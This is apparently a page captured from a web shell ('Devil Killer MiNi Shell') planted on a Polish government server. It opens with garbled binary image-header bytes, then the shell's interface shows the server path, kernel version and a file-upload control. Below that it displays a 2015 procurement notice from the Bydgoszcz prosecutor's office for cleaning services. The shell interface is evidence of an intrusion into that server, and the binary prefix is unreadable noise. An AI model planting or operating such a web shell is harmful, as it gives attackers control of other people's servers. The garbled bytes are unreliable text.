JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150217/21083-N-2015.html

<p class="kh_header"><b>Bydgoszcz: świadczenie na rzecz Zamawiającego usługi kompleksowego sprzątania pomieszczeń w obiektach Prokuratury Okręgowej w Bydgoszczy i Prokuratur Rejonowych okręgu bydgoskiego wraz z utrzymaniem czystości i zieleni na przylegających terenach zewnętrznych</b><br>
<b>Numer ogłoszenia: 21083 - 2015; data zamieszczenia: 17.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Bydgoszczy , ul. Stefana Okrzei 10, 85-317 Bydgoszcz, woj. kujawsko-pomorskie, tel. 52 32 33 130, faks 52 32 33 130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bydgoszcz.po.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie na rzecz Zamawiającego usługi kompleksowego sprzątania pomieszczeń w obiektach Prokuratury Okręgowej w Bydgoszczy i Prokuratur Rejonowych okręgu bydgoskiego wraz z utrzymaniem czystości i zieleni na przylegających terenach zewnętrznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie na rzecz Zamawiającego usługi kompleksowego sprzątania pomieszczeń w obiektach Prokuratury Okręgowej w Bydgoszczy i Prokuratur Rejonowych okręgu bydgoskiego  wraz z utrzymaniem czystości i zieleni na przylegających terenach zewnętrznych, w sposób sprawny, dokładny i terminowy, z zastosowaniem najnowszej technologii, techniki, sprzętu, materiałów i środków czystości o nie niszczącym działaniu na czyszczone elementy pomieszczeń i ich wystrój.

2.1.1. W związku z wykonywaniem czynności wym. w pkt. 2.1 SIWZ do obowiązków Wykonawcy należy: 

a_ wyposażenie pracowników w sprzęt i wyposażenie niezbędne do wykonywania przedmiotu zamówienia
b_ zakup na własny koszt następujących rodzajów środków: 
 


LP	Rodzaj środka czystości i wymagane minimalne parametry	Szacowane zużycie we wszystkich obiektach prokuratury objętych postępowaniem na cały okres trwania umowy lub informacje wspomagające w przypadku braku możliwości zbliżonego określenia szacunkowego zużycia
	Środki czyszczące, dezynfekujące i likwidujące kamień i rdzę, do toalet, WC oraz glazury i terakoty 	Należy zapewnić środki do ok. 90 sanitariatów zgodnie z częstotliwością sprzątania 
	Płyny do czyszczenia i pielęgnacji podłóg, gresowe oraz z wysokiej jakości PVC	Należy zapewnić środki w ilości niezbędnej do utrzymania czystości na podanej powierzchni biurowej
	Środek do intensywnego czyszczenia i pielęgnacji stali nierdzewnej oraz innych nawierzchni odpornych na działanie kwasów. _dot. windy osobowej, oraz poręczy na balkonach _4 szt_, klatkach schodowych _ 2 klatki_ oraz przed wejściem do budynku przy ul. Okrzei 10_. Środek, po wyczyszczeniu, nie może pozostawiać warstwy na powierzchni, która może być przyczyną zabrudzenia ubioru osób poruszających się windą. Powierzchnie po wyczyszczeniu muszą być suche.	Należy zapewnić ilość wystarczającą do utrzymania w czystości wymienionych elementów zgodnie z częstotliwością sprzątania
	Papier toaletowy biały 2-warstwowy _Merida Optimum_ lub równoważny o parametrach nie gorszych niż wymieniony tj. papier biały makulaturowy, 2-warstwowy perforowany, może być gofrowany,  pasujący do wszystkich rodzajów uchwytów oferowanych na rynku, szerokość wstęgi 9cm, średnica roli 11-12cm, ilość listków w roli: min. 454 szt., długość wstęgi min. 50m.	Ok. 18000 rolek
	Papier toaletowy biały, białość min. 75%, gofrowany,  średnica tulei 6cm, szerokość wstęgi 9cm, średnica 19cm, długość wstęgi 220m., gramatura 28-30g/m2	Ok. 750 rolek
	Ręczniki papierowe pojedyncze białe, gofrowane składane w _Z_ pakowane po 200 szt. w paczce, wymiar 25 x 23cm	Ok. 2000 paczek
	Ręcznik papierowy biały 1-warstwowy _Merida Klasik Mini_ na rolce lub równoważny o parametrach nie gorszych niż wymieniony tj. ręcznik papierowy biały 1-warstwowy gofrowany na rolce, może być perforowany, gramatura 28-30g/m2, wysokość: 20cm, średnica 13cm, długość min. 116m	Ok. 3500 rolek
	Wkładka odświeżająca firmy FRE-PRO lub równoważna o parametrach nie gorszych niż wymienione: Wkładka silikonowa _gumowa_, elastyczna, dopasowująca się do kształtu powierzchni pisuaru. Działanie odświeżające oraz bakteriobójcze min. do 30 dni. 	Ok. 200 szt.
	Odświeżacz powietrza 150 g, w żelu typu _General fresh_ lub równoważny tj. odświeżacz powietrza w żelu 150g o trwałym przyjemnym zapachu, w opakowaniu z odkręcaną przykrywką, dzięki której można regulować intensywność zapachu. Dopuszczalne zapachy: morski, bez, leśny	Ok. 1500 szt.
	Płyn do mycia naczyń _wyposażenie toalet i pomieszczeń socjalnych, pierwsze wyposażenie w butelkach _poj. od 400ml do 750ml_ z nakrętką z dozownikiem ilości płynu, dalsze uzupełnianie płynu dopuszczalne z wkładów uzupełniających itp. Płyn winien być gęsty i dobrze się pienić, bez konieczności zużywania go w nadmiernych ilościach. Zbyt rzadka konsystencja płynu może powodować zbyt szybkie zużycie i zwiększenie planowanej ilości przez okres trwania umowy.	Ok. 700 litrów
	Mydło w płynie w dobrych właściwościach myjąco-pielęgnacyjnych, zwierające pochodne lanoliny i inne substancje zapobiegające wysuszeniu skóry.
Wyposażenie toalet oraz pomieszczeń socjalnych.	Ok. 800 litrów
	Worki na śmieci jednorazowego użytku o pojemności 35l. do koszy na śmieci w pomieszczeniach biurowych itp.	Ok. 115000 szt.
	Worki na śmieci _odpady papierowe_ jednorazowego użytku o pojemności 70l. do małych niszczarek, grubość worka min. 0,016 mm	Ok. 9500 szt.
	Worki na śmieci _odpady papierowe_ jednorazowego użytku o pojemności 160l. do dużych niszczarek, grubość worka min. 0,03 mm	Ok. 1000 szt.
	tabletki dwuwarstwowe _funkcja 6w1 - skuteczne czyszczenie, funkcja soli, funkcja nabłyszczacza, usuwa zabrudzenia z herbaty, usuwa tłuszcz, ochrona przed odkładaniem kamienia do zmywarki do mycia naczyń w budynku przy ul. Okrzei 10 w Bydgoszczy	300 szt.
	odkamieniacz w saszetkach jednorazowego użytku do czajników elektrycznych	Ok. 500 saszetek
	Zmywak do mycia naczyń składający się z części miękkiej oraz szorstkiej	Ok. 1200 szt.
	Ponadto Wykonawca zobowiązany jest do używania środków do pielęgnacji mebli oraz usuwania kurzu w ilościach niezbędnych do utrzymania czystości zgodnie z częstotliwością czyszczenia danego rodzaju mebli i powierzchni, jak również używania środków przeznaczonych do czyszczenia szkła, szyb itp.

Środki chemiczne używane przez Wykonawcę do wykonywania przedmiotu umowy będą biologicznie neutralne i będą posiadały wymagane atesty, zezwalające na stosowanie ich w Polsce.  Wszystkie w/w produkty będą należytej jakości.
c_ Zwrócenie uwagi na fakt, iż wywóz odpadów z budynku przy ul. Okrzei 10 oraz Przyrzecze2-4, w Bydgoszczy odbywa się na zasadach segregacji odpadów, głównie makulatury, dlatego należy zwrócić uwagę aby odpady z niszczarek oraz inne wyroby z makulatury nadające się do segregacji były wyrzucane do odpowiednio oznaczonego pojemnika na odpady. Adekwatnie w sezonie letnim, gdzie występuje zwiększona ilość butelek plastikowych, należy je również w miarę możliwości składować do odpowiedniego pojemnika. 



2.2.    Wykaz obiektów objętych umową:
budynek biurowy Prokuratury Okręgowej w Bydgoszczy ul. Stefana Okrzei 10 - sprzątanie w obiekcie pomiędzy godzinami 14.00-20:00, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  _pomieszczenia te muszą być sprzątnięte przed wyjściem pracownika danego pomieszczenia, tj. najpóźniej do godz. 15:30_. Dodatkowo utrzymanie w czystości holu i głównych ciągów komunikacyjnych, _oprócz podłogi także elementy ozdobne na ścianach, balustrady oraz przeszklenia w drzwiach i barierkach, ewentualna wymiana worka w niszczarce w razie wystąpienia potrzeby bądź usunięcie zabrudzeń w sytuacjach tzw. nagłych itp._, pomiędzy godzinami 8.00 - 14.00 _jeden pracownik Wykonawcy_. 
budynek biurowy Prokuratury Rejonowej Bydgoszcz - Północ w Bydgoszczy, ul. Farna 6 - sprzątanie w obiekcie pomiędzy godzinami 14.00-16.00, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  _pomieszczenia te muszą być sprzątnięte przed wyjściem pracownika danego pomieszczenia, tj. najpóźniej do godz. 15:30_, oraz Przyrzecze 2-4 - sprzątanie w obiekcie pomiędzy godzinami 14.00-19.00, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  _pomieszczenia te muszą być sprzątnięte przed wyjściem pracownika danego pomieszczenia, tj. najpóźniej do godz. 15:30_.
Wykonawca zobowiązany jest również do zapewnienia mycia naczyń w przypadku organizowanych szkoleń w budynku Prokuratury Rejonowej Bydgoszcz - Północ w Bydgoszczy przy ul. Przyrzecze 2-4 - wg informacji Zamawiającego, jednakże nie częściej niż 12 razy w czasie trwania umowy.
budynek biurowy Prokuratury Rejonowej Bydgoszcz - Południe w Bydgoszczy, ul. Nowy Rynek 10 - sprzątanie w obiekcie pomiędzy godzinami 14.00-19.00, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  _pomieszczenia te muszą być sprzątnięte przed wyjściem pracownika danego pomieszczenia, tj. najpóźniej do godz. 15:30_. 
budynek biurowo-magazynowy Prokuratury Okręgowej w Bydgoszczy, Wydział V i VI ul. Zamojskiego 16, Bydgoszcz - sprzątanie w obiekcie w godzinach pracy urzędu, pomiędzy godzinami 14.00-15:30 
budynek biurowy Prokuratury Rejonowej w Świeciu ul. 10 Lutego 9, Świecie - sprzątanie w obiekcie pomiędzy godzinami 14.00-17.00, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  _pomieszczenia te muszą być sprzątnięte przed wyjściem pracownika danego pomieszczenia, tj. najpóźniej do godz. 15:30_.

budynek biurowy Prokuratury Rejonowej w Tucholi ul. Świecka 95, Tuchola - sprzątanie w obiekcie pomiędzy godzinami 14.00 - 17.00, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  _pomieszczenia te muszą być sprzątnięte przed wyjściem pracownika danego pomieszczenia, tj. najpóźniej do godz. 15:30_.
budynek biurowy Prokuratury Rejonowej w Inowrocławiu, ul. Roosevelta 23, Inowrocław - sprzątanie w obiekcie pomiędzy godzinami 14.00-19.00, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  _pomieszczenia te muszą być sprzątnięte przed wyjściem pracownika danego pomieszczenia, tj. najpóźniej do godz. 15:30_.
budynek biurowy Prokuratury Rejonowej w Szubinie, ul. Ogrodowa 14, Szubin - sprzątanie w obiekcie pomiędzy godzinami: poniedziałek 14.30-18.00, wtorek 14.30-17.00, środa 14.30-17.00, czwartek 14.30-18.00, piątek 14.00-16.00, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  _pomieszczenia te muszą być sprzątnięte przed wyjściem pracownika danego pomieszczenia, tj. najpóźniej do godz. 15:30_.
budynek biurowy Prokuratury Rejonowej w Nakle ul. Sądowa 1-3, Nakło - sprzątanie w obiekcie pomiędzy godzinami 14.00-19.00, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  _pomieszczenia te muszą być sprzątnięte przed wyjściem pracownika danego pomieszczenia, tj. najpóźniej do godz. 15:30_.
lokal biurowy Ośrodka Zamiejscowego Prokuratury Rejonowej w Szubinie z siedzibą w Żninie, ul. Sądowa 2, Żnin - sprzątanie w obiekcie pomiędzy godzinami 14.00-17.00, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  _pomieszczenia te muszą być sprzątnięte przed wyjściem pracownika danego pomieszczenia, tj. najpóźniej do godz. 15:30_.
budynek biurowy Prokuratury Rejonowej w Mogilnie ul. Benedyktyńska 5, Mogilno - sprzątanie w obiekcie pomiędzy godzinami 14.00-18.00, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  _pomieszczenia te muszą być sprzątnięte przed wyjściem pracownika danego pomieszczenia, tj. najpóźniej do godz. 15:30_.
Zamawiający dopuszcza w uzasadnionych przypadkach, za wyjątkiem pomieszczeń plombowanych oraz posiadających system alarmowy i monitoringu, możliwość pracy w dni wolne od pracy, po uprzednim uzgodnieniu z Zamawiającym, jeżeli budynek chroniony jest całodobowo 7 dni w tygodniu.
Pracownicy Wykonawcy zobowiązani są do zgłaszania pracownikowi ochrony celem odnotowania w zeszycie złożonym u pracownika ochrony budynku lub wyznaczonego pracownika danego obiektu, wszelkie widoczne nieprawidłowości w stanie poszczególnych pomieszczeń, urządzeń i umeblowania budynku.
Wykonawca zobowiązany jest w czasie wykonywania usług zapewnić na terenie objętym umową należyty ład, porządek, przestrzeganie przepisów BHP i p.poż. oraz ponosi odpowiedzialność za szkody powstałe w związku z realizacją usług oraz wskutek innych działań osób zatrudnionych przez Wykonawcę.
Wykonawca zobowiązany będzie do zachowania w tajemnicy wszelkich informacji uzyskanych w związku z wykonywaniem ww. usługi.
2.2.1 ZAKRES I CZĘSTOTLIWOŚĆ PRAC OBJĘTYCH ZAMÓWIENIEM 
Lp.	Opis prac	Częstotliwość
		w tygodniu
_razy_	w ciągu 12 miesięcy
_razy_


Pomieszczenia biurowe
1.	Odkurzanie odpowiednią końcówką szczotki _do dywanów lub powierzchni twardych płaskich_ wykładzin dywanowych, dywanów, podłoży twardych _poliuretan, PCV, winylowe_, _dni tygodnia do uzgodnienia niezależnie dla każdej jednostki_	2	-
2.	Mycie podłóg - Bieżąca konserwacja podłogi z paneli FLEXWOOD polega na odkurzaniu przy użyciu odkurzacza _patrz. Pkt.1_ oraz umyciu podłogi wilgotnym mopem z zastosowaniem delikatnego detergentu. Ok. 35% powierzchni biurowej _pom. Biurowe, magazynowe_ stanowią powierzchnie twarde płaskie _poliuretan, PCV, winylowe_	2	
3. 	Odkurzanie wykładzin dywanowych, dywanów, podłoży twardych oraz ich zmywanie, w pomieszczeniach Prokuratora Okręgowego, jego zastępców oraz w sekretariacie Prokuratora Okręgowego w Bydgoszczy w budynku przy ul. Stefana Okrzei 10 w Bydgoszczy _IV piętro_ 	5	-
4.	Odkurzanie wykładzin dywanowych, dywanów, podłoży twardych oraz ich zmywanie, w pomieszczeniu Prokuratora Rejonowego kierującego daną jednostką, jego zastępcy _-ów_ oraz ich sekretariatu.	5	-
5. 	Usuwanie kurzu z biurek, czyszczenie środkiem przeznaczonym do pielęgnacji mebli.	5	
6.	Usuwanie kurzu z mebli innych niż biurka _oraz czyszczenie środkiem do pielęgnacji mebli_, lamp biurowych, sprzętów, szafek, grzejników, parapetów, listew, drzwi, komputerów itp.	-	24
7.	Odkurzanie mebli tapicerowanych, usuwanie kurzu z kratek wentylacyjnych, zmywanie na mokro, usuwanie pajęczyn, mycie witryn w szafach biurowych.	-	2
8.	Opróżnianie pojemników na śmieci, wynoszenie do miejsc wyznaczonych, wymiana worków na śmieci	5	-
9.	Mycie drzwi szklanych środkiem odpowiednim do mycia szkła w budynku Prokuratury Okręgowej w Bydgoszczy, ul. Okrzei 10. 
- drzwi przezroczyste -  powierzchnia ok. 63m2
- drzwi mleczne - ok. 250 m2	-	12
10.	Mycie drzwi i framug, listew osłonowych	-	12
11.	Usunięcie kurzu oraz mycie lamp wiszących _obudów lamp_	-	2
12.	Mycie okien wewnątrz/zewnątrz _szyby + ramy okienne_ i parapetów wewnętrznych/zewnętrznych
- _Witryny okienne o wym. 2,30 x 4,00m. - 3 szt. + 2,30 x 2,80m. - 3 szt. w budynku przy ul. Zamojskiego 16 wymagają od strony zewnętrznej sprzętu specjalistycznego lub użycia technik alpinistycznych z uwagi na prace na wysokości I piętra
- pierwsze mycie w dn. 01.04.2015 ÷ 30.04.2015
- drugie mycie w dn. 15.09.2015 ÷ 15.10.2015	-	2
13.	Pranie firan z jednostek w Bydgoszczy, szacowana ilość: ok. 250 m2	w razie wystąpienia potrzeby niezwłocznie
14.	Pranie wykładzin dywanowych specjalistyczną maszyną - ok. 100 m2	w razie wystąpienia potrzeby
15.	Zgłaszanie wszelkich usterek technicznych do wytypowanych pracowników danego obiektu prokuratury	w razie wystąpienia niezwłocznie
Korytarze, schody _klatki schodowe_, hole
1.	Odkurzanie powierzchni podłogowych, zamiatanie, wycieranie na mokro środkiem odpowiednim do pielęgnacji posadzek, w razie potrzeby konserwacja posadzek środkami przeciwpoślizgowymi. Należy szczególną uwagę zwrócić na zbyt dużą ilość wody w źle wyciśniętym mopie itp., która w konsekwencji tworzy zacieki na bocznych ścianach stopni schodowych. 	5	-
2.	Wycieranie balustrad i poręczy
uwaga dot. budynku ul. Okrzei 10 w Bydgoszczy:
w balustradach wmontowane są osłony szklane, łączna powierzchnia ok. 55m2	-	12
3.	Sprzątanie i mycie wejść i przejść komunikacyjnych	5	-
4.	Mycie gablot, listew osłonowych itp. usuwanie kurzu z kratek wentylacyjnych	-	6
5.	Mycie drzwi i framug
- uwaga dot. budynku ul. Okrzei 10 w Bydgoszczy:
ok. 84 m2 powierzchni drzwi to szyby ,w związku z czym zaleca się użycie specjalnego środka do szkła	-	12
6.	Mycie drzwi szklanych wejściowych ruchomych do budynku przy ul. Okrzei 10 w Bydgoszczy, pow. szklana ok. 30 m2.	-	24
7.	Mycie powierzchni szklanych _tabliczki 50 x 30cm - ok. 100 szt._ z nazwą stanowiska, imieniem i nazwiskiem pracownika - dot. budynku przy ul. Okrzei 10 w Bydgoszczy. Łączna powierzchnia czyszczona jednostronnie: ok. 15m2	-	2
8.	Usunięcie kurzu oraz mycie lamp wiszących _obudów lamp_	-	2
9.	Opróżnianie pojemników na śmieci, wynoszenie do miejsc wyznaczonych, wymiana worków 	5	-
10.	Usuwanie pajęczyn	-	12
11.	Mycie okien wewnątrz/zewnątrz _szyby + ramy okienne_.
uwaga: dotyczy budynku przy ul. Okrzei 10 w Bydgoszczy: 
- Witryny szklane o łącznym wym. 1,70m. x 12m. zamontowane wzdłuż 2 klatek schodowych
-  witryna szklana na holu sięgająca od parteru do I piętra o wym. 3,30m. x 4,80m.
- witryna szklana nad wejściem głównym do budynku sięgająca od I do IV piętra w ilości 12 szt. paneli o wym. 1,15m. x 2,72m. każdy, 
wymagają od strony zewnętrznej sprzętu specjalistycznego lub użycia technik alpinistycznych z uwagi na prace na wysokości; budynek 4-piętrowy.
- pierwsze mycie w dn. 01.04.2015 ÷ 30.04.2015
- drugie mycie w dn. 15.09.2015 ÷ 15.10.2015	-	2
12.	uwaga: dotyczy budynku przy ul. Okrzei 10 w Bydgoszczy WINDA: łączna powierzchnia stali nierdzewnej uwzględniająca wnętrze kabiny, drzwi wejściowe ruchome na każdym przystanku od wewnątrz i zewnątrz wynosi ok. 35m2 - NALEŻY CZYŚCIĆ WYŁĄCZNIE ŚRODKIEM PRZEZNACZONYM DO STALI NIERDZEWNEJ!!!
Podłoga wyłożona kamieniem ozdobnym, dodatkowo powierzchnia lustrzana ok. 1m2	-	24
13.	Zgłaszanie wszelkich usterek technicznych do wytypowanych pracowników danego obiektu prokuratury	w razie wystąpienia niezwłocznie
Pomieszczenia socjalne, pokoje gościnne
1.	Wycieranie kurzu z mebli, sprzętów AGD-RTV, lamp, sprzętów, szafek, grzejników, parapetów, drzwi, usuwanie pajęczyn	-	12
2.	Sprzątanie i mycie powierzchni podłogowych, odkurzanie, wycieranie na mokro, konserwacja posadzek środkami przeciwpoślizgowymi 	5	-
3.	Mycie okien wewnątrz/zewnątrz _szyby + ramy okienne_ i parapetów wewnętrznych/zewnętrznych
- pierwsze mycie w dn. 01.04.2015 ÷ 30.04.2015
- drugie mycie w dn. 15.09.2015 ÷ 15.10.2015	-	2
4.	Przetarcie drzwi i framug, listew osłonowych, usuwanie kurzu z kratek wentylacyjnych	-	12
5.	Sprzątanie oraz mycie kuchenek gazowych, elektrycznych, piekarników, zlewów itp. Piekarnik należy czyścić również wewnątrz komory do pieczenia przeznaczonym do tego celu środkiem zgodnie z zaleceniami producenta danego środka	1	-
6.	Mycie wystawionych brudnych naczyń w kuchenkach	W razie zgłoszenia szkolenia w wyznaczonych obiektach
7.	Mycie glazury, lamperii ściennych	1	-
8.	Mycie terakoty	5	-
9.	Mycie drzwi i framug	-	12
10.	Mycie lamp wiszących	-	2
11.	Opróżnianie pojemników na śmieci, wynoszenie do miejsc wyznaczonych, wymiana worków	5	-
12.	Pranie zestawu pościeli _prześcieradło, 2 poszewki od poduszek, 1 poszewka od kołdry, 3 ręczniki_ odbiór w Bydgoszczy	W razie wystąpienia potrzeby, jednak nie więcej niż 12 razy w trakcie trwania umowy_
13.	Uzupełnianie mydła, płynu do mycia naczyń, wymiana zużytego zmywaka do naczyń	w razie wystąpienia potrzeby niezwłocznie
14.	Zgłaszanie wszelkich usterek technicznych do wytypowanych pracowników danego obiektu prokuratury	w razie wystąpienia niezwłocznie

Toalety
	Mycie i dezynfekcja wszystkich urządzeń sanitarnych, usuwanie nalotów, 	5	-
	Wymiana odświeżaczy powietrza, umieszczanie odświeżaczy w muszlach, papieru toaletowego, ręczników papierowych, mydła w płynie, płynu do mycia naczyń, woreczków do higieny intymnej.	niezwłocznie po wyczerpaniu
	Mycie okien wewnątrz/zewnątrz _szyby + ramy okienne_ i parapetów wewnętrznych/zewnętrznych
- pierwsze mycie w dn. 01.04.2015 ÷ 30.04.2015
- drugie mycie w dn. 15.09.2015 ÷ 15.10.2015	-	2
	Mycie glazury	2	-
	Mycie terakoty	2	-
	Mycie luster i armatury	5	-
	Przetarcie drzwi i framug, usuwanie kurzu z kratek wentylacyjnych	-	12
	Opróżnianie pojemników na śmieci, wynoszenie do miejsc wyznaczonych, wymiana worków.	5	-
	Mycie drzwi i framug, listew osłonowych	-	12
	Mycie lamp wiszących	-	2
	Zalewanie wodą kratek odpływowych znajdujących się w toaletach, celem uniknięcia niemiłych zapachów. 	1	-
	Uzupełnianie mydła, płynu do mycia naczyń, wymiana zużytego zmywaka do naczyń	w razie wystąpienia potrzeby niezwłocznie
	Zgłaszanie wszelkich usterek technicznych do wytypowanych pracowników danego obiektu prokuratury	w razie wystąpienia niezwłocznie


Tereny zewnętrzne
	Mycie tablicy z nazwą jednostki i godłem o wym. 80 x 80 cm - 1 szt. przy wejściu głównym do budynku	-	24
	Czyszczenie balustrad przy wejściach, na zewnątrz, w których wmontowane są osłony szklane, łączna powierzchnia ok. 14m2, czyszczenie balustrad i szkła środkiem odpowiednim.	-	12
	Czyszczenie daszku nad wejściem głównym oraz bocznym ze szkła bezpiecznego hartowanego na konstrukcji ze stali nierdzewnej, łączna powierzchnia czyszczenia szkła: ok. 7m2 oraz konstrukcja ze stali nierdzewnej środkami przeznaczonymi do danego celu. Daszek znajduje się na wys. ok. 2,5 m od powierzchni. Dotyczy budynku przy ul. Okrzei 10 w Bydgoszczy	-	12
	Czyszczenie elewacji frontowej z płyt włókno-cementowych w kolorze grafit, łączna powierzchnia 808,68m2 _wys. 14,86m., dł. 54,42m._. Zaleca się czyszczenie wodą z domieszką delikatnego detergentu w postaci np. mydła_ Konieczność użycia podnośnika. Dotyczy budynku przy ul. Okrzei 10 w Bydgoszczy	-	1
